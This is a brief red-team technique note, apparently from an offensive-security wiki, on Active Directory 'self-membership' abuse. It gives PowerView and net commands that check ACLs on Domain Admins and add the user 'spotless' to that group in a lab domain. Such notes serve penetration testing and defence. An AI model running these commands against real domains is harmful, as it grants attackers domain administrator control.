Self-membership

Another privilege that enables the attacker adding themselves to a group:

net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain

One more privilege that enables the attacker adding themselves to a group:

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}

net group "domain admins" spotless /add /domain

Last updated 2 years ago